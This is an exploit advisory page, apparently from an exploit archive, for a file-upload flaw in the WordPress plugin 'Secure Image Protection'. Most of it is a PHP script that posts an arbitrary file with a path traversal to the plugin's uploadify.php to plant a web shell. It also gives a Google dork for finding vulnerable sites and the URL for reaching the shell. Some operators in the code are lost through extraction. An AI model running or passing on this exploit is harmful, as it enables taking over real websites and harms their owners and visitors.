facebook facebook twitter rss

Wordpress Plugin Secure Image Protection File Upload Vulnerability

Author: Yunus Incredibl , Published: 18-08-2014
############################################################################
# Exploit Title : Wordpress Plugin Secure Image Protection File Upload Vulnerability

# Exploit Author : Yunus Incredibl

# Date : 17/08/2014

# Concat : https://www.facebook.com/profile.php?id=100004746796698

# Software Link : http://downloads.wordpress.org/plugin/wp-secure-image.zip

# Google Dork : inurl:"wp-content/plugins/wp-secure-image"

# Tested on : Windows 7

############################################################################

Exploit :

<?php

@set_time_limit (0);
error_reporting (0);

if (
$argc 3)
{
        if (!
file_exists ($argv[2]))
                die (
"File \"{$argv[2]}\" Not Found !");

        
$data = array
        (
                
"token_timestamp" => "Yunus",
                
"token" => "27dd0801aa60c217be1dafd3e8d512f4-",
                
"upload_path" => "../../../../../",
                
"wpsiw_file" => "@".$argv[2]
        );

        
$ch curl_init ("{$argv[1]}/wp-content/plugins/wp-secure-image/lib/uploadify/uploadify.php");
        
curl_setopt ($chCURLOPT_RETURNTRANSFERTRUE);
        
curl_setopt ($chCURLOPT_USERAGENT"Shockwave Flash");
        
curl_setopt ($chCURLOPT_ENCODING"");
        
curl_setopt ($chCURLOPT_SSL_VERIFYPEERFALSE);
        
curl_setopt ($chCURLOPT_SSL_VERIFYHOSTFALSE);
        
curl_setopt ($chCURLOPT_POSTTRUE);
        @
curl_setopt ($chCURLOPT_POSTFIELDS$data);

        
$source curl_exec ($ch);
        
curl_close ($ch);

        echo 
$source;
}
else
{
        echo 
"\n\t\tUsage : php "$argv[0], " URL your_shell upload_path\n\n",
        
"\tExample : php "$argv[0], " http://127.0.0.1/ yunus.class /\n";
        exit;
}

?>


Access : http://127.0.0.1/[SHELL_NAME]

############################################################################

Like us on Facebook :